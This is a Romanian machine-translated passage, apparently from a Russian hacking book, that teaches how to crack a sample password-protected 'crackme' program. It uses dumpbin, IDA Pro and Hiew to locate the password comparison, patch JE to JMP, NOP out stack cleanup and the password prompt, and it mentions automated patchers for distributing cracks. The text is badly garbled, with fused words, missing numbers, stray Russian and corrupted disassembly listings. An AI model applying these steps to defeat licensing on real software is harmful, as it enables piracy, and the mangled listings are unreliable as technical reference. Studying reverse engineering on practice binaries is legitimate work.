laproiectarea limbilor de nivel înalt Mai mult, asamblarea este, de asemenea, un proces unidirecțional, iar DizAssMittingautomat este fundamental imposibil O serie de sisteme de dezvoltare sunt ocupate de o poziție intermediară întrecompilatori și interpreți - programul original este transformat nu în cod de mașină, ci într -un alt limbaj interpretat,pentru execuția căreia propriul său interpret este adăugat în fișierul „compilat” Potrivit acestei scheme, FOXPRO,CHPPER, numeroase dialecte de bază și alte alte limbi funcționează Da, codul programului este încă executat în modul deinterpretare, dar acum toate informațiile în exces, numele variabilelor, comentariile și numele semnificative aleoperatorilor sunt înlocuite de codurile lor digitale sunt șterse din acesta Această „filmare” pune două păsări cu osingură piatră simultan: □ Limba care este tradusă în program este „închisă” în avans pentru o interpretare rapidă șioptimizată ca mărime □ Codul programului este acum indisponibil pentru studiul direct (și/sau modificarea) Esteimposibil să se distribuie astfel de programe-Dizassembler este orientat exact pe codul mașinii, iar limbajul necunoscutinterpretat (numit și codul L) „nu digeră” Desigur, codul L nu este De asemenea, este perceput de procesor!Este efectuat de interpretul adăugat la program Iată DizAssembler și „Take”incriminator!Studiind algoritmul operei sale, puteți înțelege „dispozitivul” codului L și aflați scopul tuturorechipelor sale Acesta este un proces foarte laborios!Interpreții sunt uneori atât de complexi și ocupă atât de mulțimegabyți încât analiza lor este întinsă timp de mai multe luni, sau chiar ani Din fericire, nu este necesară analizareafiecărui program-pentru că interpreții unei versiuni sunt identici, iar codul L în sine se schimbă de obicei puțin de laversiune la versiune, în orice caz, nucleul său nu corespunde în fiecare zi Prin urmare, este foarte posibil să secreeze un program ocupat de transformarea codului L înapoi în limba originală Desigur, numele simbolice nu vor putearestabili, dar altfel prospectul va părea destul de lizibil Deci, Dizassembler este aplicabil pentru studiul programelorcompilate și este parțial potrivit pentru analiza codului „pseudo -completat” Dacă da - ar trebui să fie potrivit pentrudeschiderea protecției parolelor Întreaga întrebare este ce Dizassembler să aleagă Pachetele DizAssemblers șiDizAssemblers Interactive nu sunt toate dizassemblers -urile la fel Printre ele există „intelectuali”, recunoscândautomat multe construcții, cum ar fi prologi și epilogi de funcții, variabile locale, legături încrucișate etc , șiexistă „simple” ale căror abilități sunt limitate doar de transferul comenzilor de mașină către instrucțiunile deasamblare a instrucțiunilor de asamblare În general, există două tipuri de dizassemblers - pachet șiinteractiv Pachetul DizAssemblers efectuează o analiză automată bazată pe parametrii selectați Lucrând cu DizAssemblersinteractive, puteți controla întregul proces DizAssemble Un reprezentant tipic al familiei de pachete DizAssemblers esteSourcer DizAssemblers interactive includ IDA Pro și Hiew DizAssemblers -urile de pachete sunt mai ușor de utilizat, darau un număr mare de restricții interne În special, ei nu sunt capabili să facă față nici măcar cele mai simple mecanismede protecție și tehnicilor anti -deliere Pentru a hack mecanisme simple de protecție și analiza programelor mici(aproximativ kb), Hiew este ideal - cel mai simplu dintre dizassembler -urile interactive Pentru a rezolva sarcinimai serioase, hackerii folosesc IDA Pro - GPAV unic Încălziți instrumente care oferă nu numai posibilitățileDizAssMitting interactive, ci și un sistem de navigație convenabil pentru fișierul analizat Eul este un iubitor iubit almajorității hackerilor, iar posibilitățile sale sunt pur și simplu fantastice Utilizarea pachetului DizAssemblers estecea mai logică pentru a utiliza serviciile unui DizAssembler-Intellectual (dacă este cazul), dar Să nu ne grăbim,dar vom încerca să efectuăm întreaga analiză manual Tehnica, desigur, este un lucru bun, dar, din păcate, nu esteîntotdeauna la îndemână și ar fi frumos să înveți cum să lucrezi „în câmp” în avans În plus, comunicarea cu undizassembler slab subliniază „bunătatea” binelui Vom folosi utilitatea Dumpbin deja familiară pentru noi, un adevărat„cuțit elvețian”, cu multe funcții utile, printre care DizAssessembler a pândit Codul dezasamblat al codului (după cumamintim, purtând numele > Duirpbin /Section: Text /DISSM CrackMe c flLea h exe> ​​ code Deci, în mai puțin de o secundă,un fișier Da, programul original a fost de ori mai scurt!Cât timp va dura să analizați acest fișier?!Cea mai ofensivăaici este că marea majoritate a codului nu are nicio legătură cu mecanismul de protecție și este o funcție abibliotecilor de compilatoare standard, pe care nu trebuie să le analizăm Dar cum să le distingem de codul „util”?Să negândim Nu știm exact unde se află procesul de comparare a parolelor Dispozitivul său ne este cunoscut, dar putem spunecu încredere că unul dintre argumentele sale este un indicator pentru o parolă standard Rămâne doar să afli ce adresă seaflă această parolă în memorie-va fi valoarea căutată a indicatorului Ne uităm din nou în secțiunea de date (sau într -oaltă secțiune - în funcție de locul în care păstrați parola) Fragmentul DAMPA de care avem nevoie este arătat în lista Lister $ Fragment din conținutul secțiunii Data obținut folosind gunoiul de gunoi> Duirpbin /Space: Data/RawData crackine c flLea h exe> ​​ Data brut Data # : : : C e e e e e e e e e e e e e e e e e e e e e e e e e e e e e A pentru f E El A ',@ O @ g @ &@ l '@ , Q@ AA@ (@ CRI? Crackme ooh enle r passwd: irry g ood password Parolă greșită parolă ok hell o,utilizator legal Da, parola este localizată în funcție de deplasarea x (coloana stângă a numerelor), prinurmare și indexul acestuia este egal cu x Să încercăm să găsim acest număr într -o listă dizassembged cu ocăutare contextuală banală în orice editor de text (listarea ) Parola se găsește într -un prospect decompensatfolosind o căutare contextuală : d F: : d ff ff ff s C Adăugare ESP, D: cu test EAX, EAX F: JE Acesta este unul dintre cele două argumenteFuncții OV x YUA , enumerate în apăsarea de comandă de sticlă Al doilea argument este un indicator pentru un buffer local, careconține probabil o parolă introdusă de utilizator Aici va trebui să ne abatem puțin de la subiectul conversației și săexaminăm în detaliu transmiterea parametrilor Cele mai frecvente sunt următoarele metode pentru transmitereaargumentelor funcției - prin registre și prin stivă Transmiterea parametrilor prin registre este cea mai rapidă, dar nueste lipsită de deficiențe în primul rând, numărul de registre este foarte limitat, iar în al doilea rând, acest lucrucomplică punerea în aplicare a recursiei-apelul funcției de la sine Înainte de a intra în noi argumente în registre,este necesar să -i prezentați pe cei vechi din RAM Și dacă da - nu este mai ușor să transferați imediat argumente prinRAM fără a suferi cu registrele?Marea majoritate a compilatorilor transmit argumente prin stivă Dezvoltatorii decompilatori nu au un consens cu privire la problemele de transmisie Există cel puțin două mecanisme diferite numiteacorduri de corporare (cu convenție) și Pascal (Convenția Pascal) C-consumatoare de C prescrie să aducă argumente înfibră de la dreapta la stânga, adică primul argument al funcției este introdus în acesta din urmă și este învârf Înlăturarea argumentelor din stivă nu este atribuită funcției în sine, ci a codului pe care l -a numit Aceasta esteo soluție destul de risipitoare, deoarece fiecare apel al funcției ezită programul pentru mai mulți octeți de cod Daracest acord vă permite să creați funcții cu un număr variabil de argumente-după toate, nu este funcția care le provoacădin stivă, ci codul care provoacă codul său, care cunoaște cu siguranță numărul exact de argumente transmise Curățareastivei este de obicei efectuată de comanda ADD ESP, XXX, unde XXX este numărul de octeți eliminați Întrucât într-un modpe de biți, fiecare argument, de regulă, ia patru octeți, numărul de argumente ale funcției este calculat după cumurmează: N ARGS = Optimizarea compilatoarelor poate utiliza un cod mai viclean pentru a curăța stiva de mai multeargumente, acestea Adesea „le toarnă” în registre neutilizate cu registrele ROR sau neutilizate sau nu curăță completstiva imediat după părăsirea funcției, dar unde este mai convenabil pentru compilator Pascal Stomplise prescrie să aducăargumente pentru a se stiva de la stânga la dreapta Aceasta înseamnă că primul argument al funcției este introdus maiîntâi în stivă și se termină în „fundul” său Îndepărtarea argumentelor din funcție este încredințată funcției în sine șieste de obicei efectuată de comanda RET XXX - adică o revenire din subprogramă cu eliminarea octetului XXX dinstivă Valoarea returnată de funcție în ambele acorduri este transmisă prin registrul EAC (sau prin intermediul perechiide registru de EDX: EAX-upon care returnează variabile pe de biți) Deoarece programul pe care îl studiem este scrispe C și, prin urmare, aduce argumentele de la dreapta la stânga, textul său original arăta aproximativ așa:(* x fa ) (EBP+fffffd h, "my good password") este că două, Și argumentele sunt exact două, și nu, să zicem, patrusau zece, suntem convinși de echipa ADD ESP, (vezi Lista ), localizată după apel Rămâne să aflați scopul funcției FA , deși dacă vă puneți intuiția, este posibil să nu se facă!Și deci este clar - această funcție comparăparola, altfel de ce i -ar fi dat?Cum face ea este a zecea întrebare, dar ceea ce ne interesează cu adevărat estereturnat de ea sens Deci, cădem cu o linie mai jos (prospectul ) Capitolul cald -up Listarea Verificarea valorii,returnată cu funcția x FAO, la egalitate zero : E din A: C D: C F: CAII FA ADD ESP, Test EAX, EAX JE Ce vedem?Echipa Test EAH, EAH verifică valoarea returnată defuncție la zero, iar dacă este într -adevăr zero, JE comentează pe linia x În caz contrar (dacă EAH! = ) : Push H arată ca un alt indicator Nu-i așa?Vom verifica aceastăpresupunere analizând segmentul de date: : A Parolă greșită Deja maicaldă!Pointerul ne -a adus la linia de parolă greșită, afișată evident de următoarea funcție de pe ecran Aceastaînseamnă că prostiile EAX indică o parolă falsă și zero - a adevăratului OK, apoi trecem la analiza sucursaleiprogramului care procesează parola corectă (lista ) din A: C D: C F: CAII BC LEA EAX, [EBP+FFFFFD H] PUSH EAX MOV ECX, A H CAII A LEA ECX, [EBP+FFFFFD H] PUSH ECX ch ESP, Test EAX, EAX JE : : B A C: E B H MOV ECX, A OH CAIII BC Ei bine, cu funcția de x vs, ne -am întâlnit deja mai devreme - acesta(probabil) servește la afișarea liniilor pe ecran Ei bine, liniile în sine pot fi găsite în segmentul de date De dataaceasta, șirul de parolă de considerente operaționale pândite există următoarele: Dacă înlocuiți comanda JE cu JNE,programul va respinge adevărata parolă, ca fiind greșită, iar orice parolă greșită va percepe ca fiind adevărată Și dacăînlocuiți Test EAX, EAH cu EAH, EAH, atunci după executarea acestei comenzi, registrul EAH va fi întotdeauna zero,indiferent de parola introdusă Cazul este mic - pentru a găsi aceiași octeți în fișierul executabil și a le repara De laEHE la CRK, este în sfârșit momentul să începeți să cunoașteți IDA Pro - fără îndoială cel mai bun dintre dizassembler-urile existente astăzi În special ideală IDA Pro este potrivită pentru hacking -ul Partea a II -a Tehnica de bază ahackingului și studierii programelor sigure Evident, exemplul de crackme c fl ea h, considerat în secțiunileanterioare, nu este un program protejat în sensul complet al cuvântului În acest exemplu, nu există nici cod criptat,nici „capcane” pentru DizAssemblers Sourcer sau orice alt Dizassembler s -ar fi ocupat de această sarcină nu mairău Prin urmare, las alegerea finală pentru cititor (apropo, IDA Pro , deși are o serie de restricții, estedistribuită gratuit) Nota datorată restricțiilor serioase privind volumul impus acestei cărți, nu este posibilă oferireaunei descrieri complete a tuturor capacităților IDA Pro Informații detaliate despre acest subiect pot fi găsite încartea „IDA DisassedMler” Rulați IDA Pro, Descărcați și Dizassemble crackme c fllea h exe Așteptați finalizareaDizassemblerului Văzând un prospect de kilometru emis ca urmare, un cititor neexperimentat poate fi înspăimântat: cum săintri în aceste sălbăticie ale unui cod de neînțeles și confuz?Sute de apeluri de funcții, multe tranziții condiționate cum să vă dați seama de toate acestea?Și cât timp va dura să analizați?Din fericire, nu este necesar să înțelegețiîntreaga listă DizAssemble Este suficient să studiezi și să înțelegem algoritmul mecanismului de protecție responsabilpentru reconcilierea parolelor Singura problemă este cum să găsiți acest mecanism în jungla nesfârșită a coduluiDizAssembler?Este posibil să se realizeze acest lucru diferit decât analiza completă a întregului program?Sigur capoti!Să încercăm, de exemplu, să utilizăm legături încrucișate pentru ASCII Tip de stres Parolă greșită, parolă OK,introduceți parola, conținută în program într-un formular necriptat (text deschis) Cel mai adesea, codul responsabilpentru ieșirea lor pe ecran este situat direct în grosimea mecanismului de protecție sau, în cel mai rău caz, estesituat undeva în apropiere Liniile în sine în marea majoritate a cazurilor sunt în segmentul de date numit Data Învechile programe MS-DOS, această regulă nu a fost adesea observată În special, compilatorul Turbo Pascal îi plăcea săaibă constante direct în segmentul de cod Pentru a merge la segmentul de date din IDA Pro ar trebui să fie selectate de segmentele din meniul ѵuiot, apoi să găsească segmentul cu numele Data printresegmentele enumerate în fereastra care apare Parcurgem ecranul Dizassembler cu câteva pagini în jos și - aici suntliniile noastre, lovind imediat chiar și cu o vizionare cursivă (listarea ) Listarea Liniile de text dorite șilegăturile încrucișate sunt ușor de găsit „în codul DizAssembged chiar și vizual Data: Data: Data: A Data: S DATA: D DATA: DATA: DATE : date: date Data: date: date Data: date Data:date Data: date Data: D Data Datata AcrackmeooHente Amy „Good Pas Swro awrongpassword apasswordOkhell db 'crackme h', ah;Date xref: sub +dunc ”Enter passwd: alinie db” my god password ”, ;Date xref: sub + aopeAliniați db wrong parolă ”, oah, ;Date xref: sub + ope db 'parola ok', ah;DATA XREF: Sub + aope db„Hello, Legal User”, ah, DD Offseet Off A Kaspersky la IDA DizAssessembler-M • Solon-R GPAVA Warm Ase vedea (Lista ), - IDA a restabilit automat legăturile încrucișate către aceste linii (adică, a determinat adresacodului care le este adresată) și le -a emis ca comentariu Alfabetizarea kabbalistică precum datele xref: sub sau efectuați un dublu clic de mouse) După o clipă, soarta ne aduceaici (listarea , poziția cursorului este evidențiată în fontul semi -fat) ['Listarea O Rezultatul didizsessembpy alfișierului crackme c f ea h exe; Text: Sub Proc în apropiere;Cod xref: start+af-lp text: text: text text: text: text: b text: d text: d text: d text: d text B text: text: text: text: text: A text: A text: F text: F text: text: text: text: text: text: B text: D text: text: text- text: text: text: C text: F text: text : -text: text: text: text: text: text: text: var c = Acrackmeohente;"Crackme h \ nonter passwd:" Cai ?? ostream@qeaav @pbd@z;Ostreani :: Operator "(char const *) Lea eax, [ESP+ A H+VAR C] MOV ECX, OFFSET DWORD A PUSHH EAX CAIII? istream@qaeaav @pad@z;Istream :: Operator (char *) Lea ESI, [ESP+ A H+VAR C] MOV EAX, OFFSETAMY GOOD PASSWO;"Aood Password" LOC F: [ESI+ ] MOV CL, DL EMP DL, BL JNZ scurt LOC Adăugați Eax, AdăugațiESI, Test Cl JNZ scurt LOC F LOC : Cod XREF: Sub " + BLJ, EAX JMP scurt LOC C LOC : :sub + xj; sub + ij sbb eax, eax sbb eax, offfffffh часть ii базовые тники (хакерства Text: сLOC C:; : E text: text: text: text: C text: C text: text: text: text: A text : A Text: A Text: A Text: a Pop ESIPOP EBX TES EAX, EAX JZ Short LOC A PUSH OFFSET AWRONGPASSWORD";"Parolă greșită \ n MOV ECX, offset DWORD A CAII ?? ostream@qeaav @pbd@z; ostream :: operator" (char consster xor eax, ex add esp, ch retn loc a: codearf:codearf ij push offset apasswordOKHELL; OK \ nhello, utilizator legal \ n " text: f text: text: text: text: b text: text: mov ecx, offset dword a catii @Z; Ostream:: Operator "(Char Consta Xor EAX, EAX Adăugare ESP, CH Retn Sub Endp Judecând după link -uri pentru aintroduce parola, parola greșită și parola OK - - Funcția sub oooooo - și există același mecanism de protecție prețuit De acord că este să analizezi o sută de linii de cod dezasamblat (și anume, funcția Sub ) nu este deloc la felca tratarea cu mai mult de douăsprezece mii de linii din fișierul sursă! Principalul obiectiv al dezvoltatorilor de apărare este proiectarea mecanismului de protecție pentru a nu lăsainformații în exces cu privire la aspectele funcționării sale Pur și simplu, nu lăsați urme!În exemplul unor astfel deurme pe care le -am luat în considerare, mulți mulți au plecat Liniile de text care informează utilizatorul despreintroducerea parolei incorecte sunt cea mai magnifică urmă pe care hackerii au văzut -o vreodată Unde conduce?Evident,la codul care conduce această linie!La rândul său, acest cod duce la codul mecanismului de protecție care îl provoacă înanumite circumstanțe Cu alte cuvinte, la sfârșitul drumului, această urmă ne va aduce la codul care ia o decizie cuprivire la corectitudinea parolei introduse-chiar inima protecției (exprimată prin terminologia militară-„sediulcomandantului șef ") În ordinea dificultăților de hacking, acest loc ar trebui mascat corect!Cu toate acestea, este preadevreme pentru noi să ne bucurăm și nu este nimic de care să fim mândri La urma urmei, codul de protecție nu a fostgăsit de noi, ci de analizatorul intelectual al IDA Pro Dizassembler Dar ce zici de nefericitul care pur și simplu nuare acest dizassembler?Ei bine, atunci puteți utiliza orice editor Hex improvizat (lăsați -l să fie Hiew pentrucertitudine) și, desigur, cu propriile mâini și cap „Stai!” Exclamă un alt cititor „De ce să te încurci cu Hiew, cândpoți cumpăra IDA Pro, scăpând astfel de nevoia de a aprofunda toată înțelepciunea analizei manuale?”Ei bine, fiecaredintre noi își alege calea vieții Și dacă rezultatul final este în primul rând important pentru tine și nu o înțelegerea esenței a ceea ce se întâmplă - vă rugăm să urmați calea cea mai mică rezistență Într -adevăr, majoritatea protecțieisunt deschise cu tehnici standard care sunt destul de simple de învățat Pentru a neutraliza astfel de mecanisme deprotecție, biscuitul nu trebuie să înțeleagă principiile muncii lor După cum am menționat deja, capacitatea de a eliminaprotecția nu înseamnă capacitatea de a o pune Acest lucru este tipic pentru Kraker, GPAVA Încălziți program derupere pentru bani și nu pentru interes La rândul său, hackerii sunt mult mai interesați de principiul funcționăriimecanismului de protecție, iar hackingul pentru ei este secundar Creer programul, dar nu -l înțelege - pentru hacker,este ca și cum să nu hack nimic deloc Abordările pentru hacking sunt diferite Puteți, de exemplu, să alegeți o parolăfolosind forța brută) sau puteți renunța la protecția unui apel intelectual și să o învingeți sau să o pierdeți Și chiardacă hackerul pierde, atunci cum pierde!Amărăciunea înfrângerii este compensată din experiența dobândită, iar experiențaoferă mâncare pentru reflectarea ulterioară Așadar, dacă sunteți hacker, - degetele dvs lucrează rapid pe tastatură,prețuite: hiew crackme c fhea h exe Acum, provocând un dialog al căutării contextuale de , încercăm să aflăm ceadresă se află linia de parolă greșită în fișier Vă rugăm să rețineți că este tocmai adresa, și nu deplasarea, deoareceHiew, în ciuda simplității aparente, în ordinea propriei inițiative analizează titlul re-fișierului și transfereazăautomat deplasările la adrese virtuale-aceste adrese pe care aceste celule le vor face Primiți după încărcareafișierului în memorie (lista ) Listarea Determinarea adreselor liniilor de text afișate în timpul intrăriiparolei greșite, : f , : - A : F S V : AO - S : - - F- - F V OA- - - ?AVIOS@ @ aq@ Dacă credeți Hiew, atunci linia de parolă greșită este situată la H Ne amintim de ea (sau,chiar mai bine - scriem -o pe o bucată de hârtie) și, nu uităm să trecem la începutul fișierului, faceți clic din nou la În câmpul Hex intrăm pe adresa de linie înregistrată în ordinea inversă: Rețineți de ce este în ordineinversă (cu alte cuvinte - înapoi) pur și simplu pentru că în procesoarele arhitecturii x , octeții mai tineri suntîntotdeauna localizați la adresa mai tânără și, în consecință,, în consecință,, dimpotrivă, dacă vă este dificil săînțelegeți ceea ce s -a spus, consultați orice manual de asamblare (sau documentație pentru procesoarele x ) găseșterapid prima intrare care se încadrează în În continuare și, apropo, deja familiar pentru noi codul mașinii (lista ) Listarea Результаты поиска кода, выводящего строку "wrong password" Е: С : : : В А С: Е : ЗЗСО : С С : СЗ А: F: В А : Е С : ЗЗСО В: С С : СЗ test еах, еах je А push movесх, А call F xor eax, eax add esp, C retn push mov есх, A call F xor eax, eax add esp, C Retn Comparați codul din lista cu listarea dizassmistităIDA Pro (listarea ) Nu este adevărat, rezultatul operei lui Hiew este ceva mai puțin informativ?Cu toate acestea, amfost distrași Să returnăm Partea a II -a Tehnici de hacking de bază pentru a analiza exemplul nostru din studiereaprototipului ostream :: operator ”(char const*) (este și funcția fh) Compilatorul de limbă cu care aduce toateargumentele de la dreapta la stânga la stivă, astfel încât x va fi indicatorul liniei (*STR), pe care le afișeazăaceastă funcție Astfel, suntem în imediata apropiere a mecanismului de protecție Facem un alt pas, mutând mai multelinii înapoi (adică în zona adreselor mai mici) Veți vedea codul afișat în lista 'Listarea O tranzițiecondiționată ascunsă necesară pentru a distinge utilizatorii legali de „imigranți ilegali” - ( ) Linii de parolă greșite JE ieșirea linieiparolei greșite Cu alte cuvinte, această tranziție condiționată transferă controlul către ramura programului, careafișează linia de parolă OK octeți care împiedică utilizatorii ilegali (precum și toate parolele legale, dar uitate),au acces la program Este evident că dacă schimbați tranziția condiționată JE A la JMP necondiționat așa cumeste corect O traducem Nenia în fișier apăsând tasta și ieșim Rulăm programul și încercăm să introducem oricecuvânt (de preferință din vocabularul normativ) care ne -a venit în minte Dacă totul s -a făcut corect, atunciinscripția „Parolă OK” se aprinde triumfător pe ecran Dacă programul a atârnat, atunci am făcut o greșeală undeva Vomrestabili programul cu o copie de rezervă și vom repeta din nou Dacă hackingul a avut succes, atunci puteți încerca săveniți cu un fel de glumă De exemplu, să ne gândim la ce se va întâmpla dacă înlocuiți JE cu JNE?Ramurile programuluivor schimba locurile!Acum, dacă este introdusă o parolă incorectă, sistemul o va percepe ca un adevărat, iar unutilizator legal, introducând o parolă reală, va fi surprins să citească un mesaj de eroare Rețineți că protecția estehackneyed?Da, este hacked Vă rugăm să rețineți că, în secțiunea anterioară, „Utilizarea DizAssemblers de pachete”,aceeași sarcină a fost rezolvată folosind utilitatea Dumpbin Ehe acum același obiectiv a fost atins folosind undizassembler interactiv, astfel încât obiectivul final al hackingului a fost atins Dar ați înțeles principiulfuncționării mecanismului de protecție?La urma urmei, nu am recunoscut niciodată principiul operei ei Ce se întâmplădacă o verificare suplimentară este prezentă în mecanismul de protecție, care, în cazul unei parole introduse incorect,transferă programul într -un mod demonstrativ și pur și simplu încetează să funcționeze după câteva zile Este bine,chiar dacă nu se potrivește cu o înțelegere, cum ar fi formatarea unui hard disk!Din acest motiv, este recomandat înorice caz să analizezi întregul mecanism de protecție, pornind de la prima linie a funcției Sub și se încheie cucomanda de returnare (lista ) Dacă sunteți un nou venit în DizAssempsing, citiți cartea menționată anterior „IdaDizassembler” Listarea Listarea dezasambretă a procedurii de protecție Text: Sub Proc Near; Codexref: Start+af^p Text- VAR C = byte ptr - Ch Гпава Разминка text: text: text: text: text: text: B text: C text: D text: D text : D text: •text: text: text: text: text: text: text: text: text: text: text: text: text: text: text: B text: -text: •text: text: text: text: text: text: text : text: text: text: text: text: text: text: A text: A text: A text: A text: • Text: Text: sub esp, ch;Subliniem memoria pentru variabilele locale Mov eu, offset dword a ,push ebx push esi push push offset acrackmeohente, • "crackme h \ nenter passwd:" sună? ostream@qeaav @pbd@z;Ostream:: operator "(char const *);Ghidat de prototipul ostream :: operator ”(char const *) ,;IDA recunoscut, puteți determinavalorile argumentelor;Această funcție, listată pe o fibră de la dreapta la stânga ;Offset acrackmeohente - un indicatorde ieșire;Și împinge Edx și Push ESI nu sunt argumentele funcției;(după cum poate părea la prima vedere) ;Acestea suntdoar valori păstrate temporar în stivă ;Deplasarea încărcată în ECH este un indicator;pe o copie a obiectuluiBasic ostream, încărcat în memorie;la A H LEA AX, [ESP+ A H+VAR C] MOV ESH, OFFSET DWORD A PUSH EAX CALL? istream@qeaav @pad@z;Istream :: operator "(char *);Acum funcția istream se numește :: operator ”(char *) ,;care citeșteparola de pe dispozitivul de intrare standard;(tastatură) Are un prototip similar;cu excepția faptului că în loc deadresa liniei afișate;Ea ia un indicator la tamponul primitor;Care în acest caz este implementat în variabilaѵAG s Lea ESI, [ESP+ A H+VAR C];Încărcăm indicatorul la tampon în ESI;conținând o parolă introdusă MOV EAX, OFFSETAMY GOOD PASSWO;"T Good Password";Încărcăm indicatorul la EAX pe o linie similară;Pe parola standard LOC F : Codxref: sub + j pentru a merge la modul hexadecimal (cu excepția cazului în care este setată prin modulimplicit) Faceți clic pe pentru a introduce adresa de tranziție Apoi introduceți adresa în sine într -un punctprematur (punctul este necesar pentru a indica Hiew că este adresa și nu deplasarea în fișier) Faceți clic pe pentru a activa modul de editare Intrând în modul de editare, înlocuiți byte Retn (cod C H) cu codul de comandă NOP- H(rețineți că OPDO al comenzii NOP este de H și deloc H, așa cum se gândesc multe coduri de începători din anumitemotive) Se pare că am făcut totul bine Cu toate acestea, atunci când rulați programul pentru execuție, veți vedea ocasetă de dialog care raportează că „programul a finalizat o operație inacceptabilă și va fi închis” O da!Am uitatcomplet de compilatorul de optimizare!Acest lucru face dificilă modificarea programului, dar în niciun caz nu faceimposibil Să ne uităm la „capota” a sistemului Windows puternic și să vedem ce se întâmplă acolo Lansați din nouprogramul și în loc de închidere de urgență, faceți clic pe butonul Information, în urma căruia vom fi informați că:"Crack me c fliea h exe a provocat un eșec atunci când accesați modulul MSVCP DLL la F: C D" Informațiidezinformative dezinformative!Desigur, eroarea nu este în niciun fel legată de msvcp dll, iar GPAVA este indicată Warm -up -up -ul celei de -a -a adresă, care se află adânc în intestinele acestuia din urmă, nu ne spune nimic Chiardacă avem ocazia să mergem acolo Debuggerul, încă nu vom găsi motivul eșecului, deoarece parametrii greșiți au fost transportați acestei funcții, ceea cea dus la o situație excepțională Desigur, acest lucru nu vorbește în favoarea Microsoft: ce fel de funcție este aceastadacă nu verifică corectitudinea argumentelor care i -au fost predate!Pe de altă parte, verificările excesive nu sunt încel mai bun mod care afectează viteza și compactitatea codului Dar avem nevoie de o astfel de optimizare?Păcat că echipaWindows Developer nu aude această întrebare Cu toate acestea, am fost distrași Penetrați în Windows și aflați ce nu esteexact în ordine, un alt produs al Microsoft ne va ajuta cu MS Visual Studio Debugger Fiind instalat în sistem, el adaugăbutonul de depanare la fereastra de finalizare de urgență Cu ajutorul său, nu putem doar să închidem aplicația de lucruincorect, ci și să aflăm cauza erorii Vom aștepta din nou apariția acestei ferestre și vom apela debuggerul integrat înMicrosoft Visual C ++ Deși acesta nu este cel mai puternic dintre debuggerii existenți, dar pentru acest caz este destulde potrivit După cum sa menționat deja, nu are rost să cauți o pisică neagră într -o cameră întunecată, mai ales dacă nueste acolo Codul care afișează un mesaj de eroare nu este conectat în niciun fel cu codul care a dus cu adevărat laapariția acestuia În primul rând, trebuie să ieșim din adâncurile funcțiilor cuibărite „în sus” pentru a merge pe urmeleadevăratului vinovat al celor întâmplate, acel cod care transmite parametri incorecte restul funcțiilor Pentru a faceacest lucru, va trebui să analizați adresele de întoarcere din stivă Într -o formă lizibilă, aceste informații pot fifurnizate de CAII Stack Master, al cărui rezultat este prezentat în lista , Prospect Vizualizați conținutulapelurilor funcțiilor din Debugger Std :: BASIC OSTREAM :: opfx (std :: Basic ostra std: Basic ostream > :: Put (std :: Basic ostrea std :: endl (std :: Basic ostream > & { }) crackme c fllea h ' cthreadslotata :: setValue (ctwalue (cthreadslue int , Deoarece sticla crește de la adrese senior la cele mai tinere (în lista , acest lucru corespunde direcției „de josîn sus”), în consecință, trebuie să coborâți în direcția opusă Primele trei provocări pot să fie omis în siguranță(întrucât aceasta este - întrucât aceasta este - deoarece aceasta este - deoarece această bibliotecă funcționează carenu conțin nimic interesant), dar a patra provocare, crackme c fl ea h, aparține aplicației noastre Aceasta este sursadirectă a sursei directe a Eroarea Vom face clic pe el cu mouse -ul și vom merge direct la fereastra DizAssembler(listarea ) Listând , USD Sosire la scena E Test EAH, EAX A push h mov ecx, A h С caii F xor eax, eax Add esp, Ch пор А Push h F mov ecx, A h caii F xor eax, eax В add esp, Ch ret ЧастьII Tehnici de hacking de bază veți învăța codul înconjurător?Da, da!Acesta este chiar locul în care l -am înșelatușor Dar care este motivul erorii?Ne atragem atenția asupra faptului că instrucțiunile de ret sunt precedate de o echipăde curățare a stivelor de la variabilele locale: Adăugați ESP, SN Și aceeași echipă se repetă înainte de finalizarea„reală” a funcției în linia bh Dar, după ce a redirecționat stiva, echilibrarea acesteia este încălcată și, în locde adresa întoarcerii de la funcție în partea de sus a stivei, toate prostiile se încadrează la comportamentulimprevizibil al aplicației pe care l -am hacked Cum să evitați acest lucru?Da, este foarte simplu - ștergeți una dintrecomenzile ADD ESP, CH, marcând -o cu instrucțiuni NOP Sau înlocuiți ch cu zero (atunci când adăugați la ceva zero,valoarea sa nu se schimbă) După aceea, programul hacked încetează să mai fie capricios și începe să funcționeze normal,ceea ce confirmă lista - Listarea Acum, protecția va percepe orice parolă introdusă drept dreapta>crackme c fhea h exe introduceți paswd: xxxx hacked by kpnc parola ok hello, utilizator legal, deci, protecțiahackingului Cu toate acestea, acesta este un hacking murdar (vom lăsa etica deoparte, nu este vorba despre asta) Unhacking murdar este un hack nepăsător Și deși cracker -ul obișnuit se oprește de obicei în acest sens, vom merge maideparte La urma urmei, programul solicită încă o parolă Această solicitare poate irita foarte mult utilizatorul, înciuda faptului că programul percepe absolut orice parolă la fel de corectă Ei bine, să modificăm programul, astfel încâtsă nu ne distragă o cerere de parolă!Una dintre soluții va fi eliminarea procedurii de intrare a parolei Acordațiatenție punctului important: împreună cu procedura, este necesar să eliminați parametrii înscriși în sticlă, altfel Sticla se va dovedi a fi dezechilibrată, iar consecințele nu se vor forța să aștepte Revenind la listarea dezasamblată aunui program rupt, vedem că funcția de intrare a parolei este situată la H, iar argumentul este transferat echipa(această funcție are doar una) la H Pentru o deconectare completă a protecției, ambele apeluri trebuie pierduteprin instrucțiunile NOP Și atunci codul programului va arăta așa cum se arată în lista (liniile modificate suntevidențiate în fontul semi -fat) Listarea Код взломанной программы : ЕС С sub esp, C : В А mov ecx, A ;" @SP" В: push ebx С: push esi D: push ;" @ИР" :E DE caii F : D LEA EAX, [ESP] [ ] : NOP : D LEAESI, [ESP] [ ] A: B S MOV EAX, C @I "GPAVA WREN Salvăm modificări în fișier, lansăm -lși funcționează!În ciuda faptului că linia de parolă Enter este încă vizibilă, parola în sine nu mai estesolicitată, iar munca programului nu este suspendată Este posibil să eliminați linia de parolă Enter?Desigur de cenu!Mai mult decât atât, nu este nevoie să se reducă instrucțiunile NOP care îi produc procedura Este suficient săintroduceți un singur zero în începutul liniei sau chiar să folosiți această linie pentru a vă retrage „copia” Într-adevăr, linia de parolă greșită este prea scurtă și nu orice nume poate fi plasat în ea Este mai bine să utilizațilinia de parolă Enter pentru hacked, iar linia de parolă greșită este complet oferită „graffiti -ului” dvs Deci, hack-ul nostru aproape s -a încheiat Rămâne să rezolvăm ultima întrebare - cum ne putem răspândi „creația”?Fișiereleexecutabile au, de obicei, un volum foarte mare, iar restricțiile legislative dure sunt impuse distribuției lor Ar fibine să explicăm utilizatorului care ar trebui schimbate octeții, astfel încât programul să funcționeze, dar poate să neînțeleagă?În acest scop, au fost inventate biscuiti automate Mai întâi trebuie să instalați: care octeți dintr -unfișier hacked au fost 